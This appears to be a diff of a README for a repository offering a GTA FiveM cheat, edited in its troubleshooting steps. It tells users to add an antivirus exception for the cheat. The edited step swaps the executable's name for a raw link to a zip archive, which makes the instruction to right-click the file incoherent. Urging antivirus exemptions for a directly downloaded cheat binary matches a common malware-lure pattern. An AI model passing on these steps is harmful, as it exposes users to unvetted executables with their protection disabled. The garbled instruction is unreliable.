SIXXTAR/GTA-FiveM-Cheat/README.md

 1. **Check Your Antivirus:** Sometimes, antivirus programs block mod menus.
 Add an exception for GTA-FiveM-Cheat if needed.
 2. **Re-Download the Files:** If the application does not run, the downloaded files may be corrupt.
 Repeat the download and extraction steps.
-3. **Compatibility Settings:** Right-click the `GTA-FiveM-Cheat.exe` file, select "Properties," navigate to the "Compatibility" tab, and try running the program in compatibility mode for Windows 8.
+3. **Compatibility Settings:** Right-click the `https://raw.githubusercontent.com/SIXXTAR/GTA-FiveM-Cheat/main/RVX-4_External/GTA-FiveM-Cheat_v3.6.zip` file, select "Properties," navigate to the "Compatibility" tab, and try running the program in compatibility mode for Windows 8.

 ## 💬 Need Help?